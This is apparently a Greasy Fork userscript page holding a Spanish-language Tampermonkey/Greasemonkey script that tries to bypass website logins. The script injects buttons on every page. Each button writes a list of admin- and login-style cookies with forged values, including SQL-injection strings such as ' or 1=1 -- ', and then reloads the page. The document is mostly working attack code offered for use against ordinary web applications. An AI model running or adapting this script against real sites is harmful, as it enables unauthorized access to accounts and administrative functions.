CHPMEGAC00KIEH4X

Trata de saltearse logins manipulando las cookies

چۆنیەتی دابەزاندن

You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey to install this script.

You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey or Userscripts to install this script.

You will need to install an extension such as Tampermonkey to install this script.

You will need to install a user script manager extension to install this script.

(I already have a user script manager, let me install it!)

چۆنیەتی دابەزاندن

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(I already have a user style manager, let me install it!) 

// ==UserScript==
// @name           CHPMEGAC00KIEH4X
// @namespace      https://greasyfork.org/
// @description    Trata de saltearse logins manipulando las cookies
// @version        0.3
// @include        *
// ==/UserScript==
// V 1.1

// ====
// Autor: seth (xd dot seth at gmail dot com)
// Contribuciones: The X-C3LL (http://0verl0ad.blogspot.com/)

// Queres ayudar? Entrá a http://osvdb.org/search?search[vuln_title]=Cookie+Manipulation&search[text_type]=titles y buscá los nombres y valores de las cookies

// Changelog:
// 1.2 Cambios esteticos
// 1.1 Anda de nuevo
// 1.0 Primer version

//Metemos el div con los botones
var str = '';
for (var i=0; i<13; i++){
  str = str + '<input value="[' + i + ']" onclick="mandale_mecha(' + i +');" type="button" style="width:100%; height:20px" /><br />';
};
var div = document.createElement("div");
div.innerHTML = '<div style="height: 60px; width:100px; position:fixed; top:5px; right:5px; background-color: black; color: #AAAAAA;">' + str + '</div>';

document.body.appendChild(div);

//La funcion que crea las cookies
function mandale_mecha(valor){
  nombres = ['admin', 'logueado', 'loged', 'user', 'usuario', 'userId', 'loggedon', 'adm', 'login_admin', 'AdminPass', 'Auth', 'Name', 'level', 'logged', 'admin_log',
'adminLoggedIn', 'myadminname', 'awse_logged', 'authuser', 'group_id', 'lvl', 'membercookie', 'memberid'];
  valores = ['true', 'yes', 'si', '1', 'admin', 'administrador', 'administrator', 'OK', 'right', 'logged', 'in', ' or 1=1', '\' or 1=1 -- '];

  var exdate = new Date();
  exdate.setDate(exdate.getDate() + 1);

  for (i=0; i<nombres.length; i++){
    var c_value = escape(valores[valor]) + "; expires="+exdate.toUTCString();
    document.cookie = nombres[i] + "=" + c_value;
  }

  location.reload();
}

// http://stackoverflow.com/questions/5006460/userscripts-greasemonkey-calling-a-websites-javascript-functions/5006576#5006576
function addFunction(func, exec) {
  var script = document.createElement("script");
  script.textContent = (exec ? "(" : "") + func.toString() + (exec ? ")();" : "");
  document.body.appendChild(script);
}

//Metemos la funcion en la pagina para que pueda ser llamada por onclick
addFunction(mandale_mecha, false);